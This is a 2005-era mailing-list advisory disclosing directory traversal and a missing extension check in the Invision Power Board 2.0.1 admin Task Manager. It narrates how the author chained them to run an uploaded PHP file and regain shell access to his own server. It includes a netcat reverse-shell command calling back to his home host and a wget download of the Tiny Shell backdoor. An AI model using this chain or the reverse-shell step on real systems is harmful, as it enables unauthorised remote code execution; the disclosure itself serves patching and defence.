<<< Date Index >>>     <<< Thread Index >>>

Invision Power Board Privilege Esaclation (2.0.1 + more)



---------
Title: Invision Power Board
---------
Version: 2.0.1 (maybe more)
---------
Severity: Low
---------
Info: Invision Board Admin able to execute arbitrary code as uid of
the apache process.
----------
Bug(s):

#1 Fails to jail location of Task Managers scripts and allows
directory traversal.

#2 The 'Task PHP File To Run' does not check for '.php' extension and
allows user to run uploaded files with any extension including
Invision's '.ipb' upload extension.




-:Hack Your Own Server Through Invision Power Board Admin Console:-
by: Antimatt3r
email: antimatter@xxxxxxxxx
####################################################################


Problem
---------
Due to basically lack of sleep and panic over seeing 20 sshd processes
when doing a process listing. Without thinking, I did a 'killall -9
sshd' as root.I was immediately disconnected and said 'oh sh17'.
I basically just severed my only ability to login to the box and had
no means of rebooting it.
I run a number of services but keep my system patched. Even the
Invision Board has always been patched.

Background
---------
Collocated server 1200 miles away.
No one has access to it for long periods of time, basically complete
remote administration.
I'm running a couple of forums. One of which uses version 2.0.1 of
Invision Power Board.

Research\Exploit
---------
After long thoughts about what was I going do to be able to get a term
on the box and many people telling me "you're screwed" I figured Id
start at the weakest point on my box which is the phpbb board (sorry
phpbb but we all know its true) used for another site. No obvious
holes\misconfigurations. I then logged into the Invision Admin Console
because it has a lot of features I've never even looked into and I
wasn't sure what I could do. Now here is where it starts getting
interesting.

I was looking for something that would let me run or add my own php
code so I could basically have a 'php shell'. I stumbled across 'Task
Manager' where it had some tasks it ran on a chronological basis or to
run a task on demand. It also has the ability to add your own task.
The tasks are .php files. The problem was that I still had to manually
add the php file to the box in a hard coded './sources/tasks/'
directory. You then have a field to add the filename for this path. I
started with the basic '../../index.php' (this would be the path to
the main index.php so I could be sure it was there) to see if this
directory was jailed correctly. It Wasn't(Bug #1)! But all I got from
that was some errors when it tried to run the 'index.php' as a task
file. So I still needed a way to get the file on there. I remember
that you could add attachments to the forum and they were stored in
the upload directory. The other thing I remember though was that the
filenames were scrambled (or changed from what they really were to
some kind of post information and a timestamp, for lack of a better
word Ill call it a hash from now on) in this directory so I would have
no way of knowing what to point the task too.

Before I even went down this path I tried adding '../../uploads/' to
the task file name. Not that I thought putting a directory in would do
anything but just to see if it checked for a '.php' extension on the
task file. It didn't (Bug #2)! It basically dumped out errors but that
was all I needed to see to know I should be able to pass anything and
have the php code executed. The next thing I looked at was how you
accessed attachments, hoping maybe I could find the hash name of the
file. The link to an attachment looked like
http://www.website.com/forum/index.php?act=Attach&type=post&id=27
So there was nothing there to go on other but it made me think the
database must have some way of associating id=27 with the hash name.

So I then did a full .sql dump which you can do through the web
interface. Trying to determine what 27 meant in 10MB of raw sql was
not working. I then went back to the Admin Interface and looked at the
'SQL Toolbox' from here you could click any of the tables and a
command would be presented so you could run it and see everything in
the table. So there was a table call ibf_attachments and I ran the sql
cmd  'select * from ibf_attachments'. This gave me the info I needed
for what the real uploaded file name was being mapped to in the
uploads directory. (I noticed what looked like a keyword combined with
a timestamp and given a .ipb extension). So I uploaded my 'php shell'
file by posting a topic in the form and adding it as an attachment,
found what the name of the file was being stored on the local disk as
from database, and then added this to my path of my task file to be
executed so it looked something like '../../uploads/'
post-5-1130919619.ipb'. Then I just clicked the task run now link in
the Admin CP that would execute the script.

This kind of worked and I was presented with a place to enter commands
that should run but when I would post one of the commands I would get
kicked back to the login screen for the admin control panel. I didn't
really look into why, I'm assuming I was supposed to post a some
session key but I dint want to go through all that since I figured I
could just easily run some commands with the system() php command as
the Apache user. So I then wrote a very simple php script  to connect
back to my home computer over a netcat session('netcat myhouseip
myport -e /bin/bash'). I did the same trick of uploading the php code
as an attachment, finding the locally stored same, and editing my task
so the new path. I then set up my box to listen for the connection
(netcat -l -p <myport>). I once again click the 'Run Task Now' link.
This time the page just held in the loading state. This was because it
had executed my netcat code and was waiting for the pipe to be closed.
Once connected realized I couldn't su to the root user or any other
user because the input for password was the stdin on the remote box. I
tried to start ssh but it complained about missing keys. I needed a
shell that had a terminal attached. I remember from a wargame before
using tiny shell and being able to do more commands. A quick search on
Google confirmed this would be what I needed.

>From my netcat session I was able to do a  wget to grab the tiny shell
0.6 src (wget http://www.cr0.net:8040/code/network/tsh-0.6.tgz). I had
one port above 1024 that had been left open in iptables for a web
interface to a game server that was no longer running (long live
UT99). I had to edit the 'tsh.h' file by using echos and redirection
since I could not use vi from my netcat term (I could have also used
the Connect Back option in Tiny Shell if I didnt have an open port).
>From there I just had to to build the application (make linux) and
execute the daemon (./thsd). I built it with  the same option and ran
the client (./tsh serverip) I was connected and given the shell I
needed. I immediately su'd and restarted the ssh daemon.


Conclusion
---------
I would have to say this is a very low severity for most people
because you have to be an admin on an Invision Board to be able to do
this in the first place. But if the Invision Board is being provided
as a service (like the one provided at http://www.invisionboard.com)
then the admin can now get elevated privileges and a shell as the uid
of the apache process, so in this case it is more serious. Or this can
be also very useful if you do something stupid like killing sshd where
rebooting is not an option.